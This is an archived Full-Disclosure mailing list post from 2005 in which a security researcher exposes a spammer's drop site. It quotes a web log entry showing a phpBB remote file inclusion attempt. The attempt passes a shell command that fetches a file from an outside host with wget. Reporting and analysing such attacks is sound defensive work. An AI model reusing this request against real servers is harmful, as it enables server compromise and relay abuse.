[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    [Full-disclosure] Microsoft MSN MESSENGER PATCH PLUS. Download
From:       Tom Ferris <tommy () security-protocols ! com>
Date:       2005-07-29 2:21:09
Message-ID: Pine.LNX.4.63.0507281920190.13511 () secpro ! servermatrix ! com
[Download RAW message or body]

Just wanted to expose this spammers site.  I noticed the following in my 
web logs:

200.233.226.8 - - [27/Jul/2005:20:16:08 -0700] "GET
/admin_styles.php?phpbb_root_path=http://pharoeste.net/x/out.gif?&cmd=cd%20/tmp;%20wget%20http://binaryshadow.org/~w00t
 /dc.txt;ls HTTP/1.1" 404 7279 "-" "Mozilla/5.0 (Windows; U; Windows NT 
5.1; pt-BR; rv:1.7.8) Gecko/20050511
Firefox/1.0.4"

It is apparent from the logs above and research I have done that he is 
trying to exploit a phpBB vuln in order to
compromise hosts and use them as spam relays.

spammers drop site:
http://www.binaryshadow.org/~w00t/

mirror:
http://www.security-protocols.com/binaryshadow-mirror/

Thanks,

Tom Ferris
Researcher
www.security-protocols.com
Key fingerprint = 0DFA 6275 BA05 0380 DD91  34AD C909 A338 D1AF 5D78
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[prev in list] [next in list] [prev in thread] [next in thread]